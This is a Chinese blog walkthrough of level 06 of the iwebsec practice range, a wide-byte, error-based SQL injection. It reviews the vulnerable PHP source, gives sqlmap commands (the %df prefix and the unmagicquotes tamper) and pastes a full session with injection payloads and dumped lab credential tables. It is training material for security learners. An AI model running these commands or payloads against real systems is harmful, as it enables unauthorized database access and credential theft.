系列文章目录
iwebsec靶场 SQL注入漏洞通关笔记1- 数字型注入_mooyuan的博客-CSDN博客
iwebsec靶场 SQL注入漏洞通关笔记2- 字符型注入(宽字节注入)_mooyuan的博客-CSDN博客
iwebsec靶场 SQL注入漏洞通关笔记3- bool注入(布尔型盲注)_mooyuan的博客-CSDN博客
iwebsec靶场 SQL注入漏洞通关笔记4- sleep注入(时间型盲注)_mooyuan的博客-CSDN博客
iwebsec靶场 SQL注入漏洞通关笔记5- updatexml注入(报错型盲注)_mooyuan的博客-CSDN博客
目录
系列文章目录
前言
一、源码分析
二、sqlmap注入
1.注入命令
2.完整交互过程
总结
前言
打开靶场的SQL注入关卡的第06关,宽字节注入iwebsec靶场 SQL注入漏洞通关笔记5- updatexml注入(报错型盲注)_mooyuan的博客-CSDN博客如下所示
一、源码分析
如下所示,SQL语句与1-5关的大多数关卡一样,调用的语句为$sql="SELECT * FROM user WHERE id=$id LIMIT 0,1";很明显这是一个普通的数字型注入,并且没有对参数id做任何过滤。
不过在输出内容中可以得知仅sql查询成功时输出正确的id,用户名和密码。在错误的时候却执行语句print_r(mysql_error());这个报错语句的使用意味着我们可以利用报错型函数如updatexml,extractvalue等函数进行SQL注入,换言之渗透方法可以参考第05关报错型注入。不过呢,本关卡的源码中如下语句说明其为宽字节型
mysql_query("SET NAMES gbk");也就是说本关卡的注入可以使用报错型的宽字节注入
二、sqlmap注入
1.注入命令
方法1:参数id后加上%df
sqlmap -u http://192.168.71.151/sqli/05.php?id=1%df --current-db --dump --batch如下所示,渗透成功
方法2:sqlmap的注入命令语句使用--tamper unmagicquotes
sqlmap -u http://192.168.71.151/sqli/05.php?id=1 --current-db --dump --batch --tamper unmagicquotes2.完整交互过程
完整的注入交互如下所示
kali@kali:~$ sqlmap -u http://192.168.71.151/sqli/05.php?id=1%df --current-db --dump --batch_____H__ ___ ___[.]_____ ___ ___ {1.5.11#stable}
|_ -| . ["] | .'| . |
|___|_ [)]_|_|_|__,| _| |_|V... |_| https://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting @ 23:36:21 /2022-11-24/[23:36:21] [INFO] resuming back-end DBMS 'mysql'
[23:36:21] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)Type: boolean-based blindTitle: Boolean-based blind - Parameter replace (original value)Payload: id=(SELECT (CASE WHEN (8465=8465) THEN 1 ELSE (SELECT 7769 UNION SELECT 3720) END))Type: error-basedTitle: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)Payload: id=1 AND (SELECT 1776 FROM(SELECT COUNT(*),CONCAT(0x7171717871,(SELECT (ELT(1776=1776,1))),0x7170707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)Type: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: id=1 AND (SELECT 2424 FROM (SELECT(SLEEP(5)))vTBV)Type: UNION queryTitle: Generic UNION query (NULL) - 3 columnsPayload: id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x7171717871,0x7a756e6165784e50754f725a797052684779706b716f4d504b4e7354596277657354776f4f724468,0x7170707171)-- -
---
[23:36:22] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 6
web application technology: Apache 2.2.15, PHP 5.2.17
back-end DBMS: MySQL >= 5.0
[23:36:22] [INFO] fetching current database
current database: 'iwebsec'
[23:36:22] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[23:36:22] [INFO] fetching current database
[23:36:22] [INFO] fetching tables for database: 'iwebsec'
[23:36:22] [INFO] fetching columns for table 'user' in database 'iwebsec'
[23:36:22] [INFO] fetching entries for table 'user' in database 'iwebsec'
Database: iwebsec
Table: user
[3 entries]
+----+----------+----------+
| id | password | username |
+----+----------+----------+
| 1 | pass1 | user1 |
| 2 | pass2 | user2 |
| 3 | pass3 | user3 |
+----+----------+----------+[23:36:22] [INFO] table 'iwebsec.`user`' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.71.151/dump/iwebsec/user.csv'
[23:36:22] [INFO] fetching columns for table 'sqli' in database 'iwebsec'
[23:36:22] [INFO] fetching entries for table 'sqli' in database 'iwebsec'
Database: iwebsec
Table: sqli
[7 entries]
+----+-----------------------+----------+------------------------------------------------------+
| id | email | password | username |
+----+-----------------------+----------+------------------------------------------------------+
| 1 | user1@iwebsec.com | pass1 | user1 |
| 2 | user2@iwebsec.com | pass2 | user2 |
| 3 | user3@iwebsec.com | pass3 | user3 |
| 4 | user4@iwebsec.com | admin | admin |
| 5 | 123@123.com | 123 | 123 |
| 6 | 1234@123.com | 123 | ctfs' or updatexml(1,concat(0x7e,(version())),0)# |
| 7 | iwebsec02@iwebsec.com | 123456 | iwebsec' or updatexml(1,concat(0x7e,(version())),0)# |
+----+-----------------------+----------+------------------------------------------------------+[23:36:22] [INFO] table 'iwebsec.sqli' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.71.151/dump/iwebsec/sqli.csv'
[23:36:22] [INFO] fetching columns for table 'users' in database 'iwebsec'
[23:36:22] [INFO] fetching entries for table 'users' in database 'iwebsec'
Database: iwebsec
Table: users
[1 entry]
+-------+-------------+----------+
| role | password | username |
+-------+-------------+----------+
| admin | mall123mall | orange |
+-------+-------------+----------+[23:36:22] [INFO] table 'iwebsec.users' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.71.151/dump/iwebsec/users.csv'
[23:36:22] [INFO] fetching columns for table 'xss' in database 'iwebsec'
[23:36:22] [INFO] fetching entries for table 'xss' in database 'iwebsec'
Database: iwebsec
Table: xss
[5 entries]
+----+------------------------------------+
| id | name |
+----+------------------------------------+
| 7 | <img src=1 onerror=alert(/ctfs/)/> |
| 6 | <img src=1 onerror=alert(/ctfs/)/> |
| 5 | <img src=1 onerror=alert(/ctfs/)/> |
| 1 | iwebsec |
| 8 | <?php phpinfo();?> |
+----+------------------------------------+[23:36:22] [INFO] table 'iwebsec.xss' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.71.151/dump/iwebsec/xss.csv'
[23:36:22] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.71.151'
[23:36:22] [WARNING] your sqlmap version is outdated[*] ending @ 23:36:22 /2022-11-24/
总结
iwebsec靶场的宽字节注入由于使用了报错函数,加上类型为宽字节,而闭合的判断上只是与前几关一样为普通的数字型注入,故而搞清楚原理后,只需要配置正确参数使用sqlmap渗透十分方便高效。初学者还是应该以手动注入方法练习,真正了解原理后可以在使用sqlmap来提升速度。
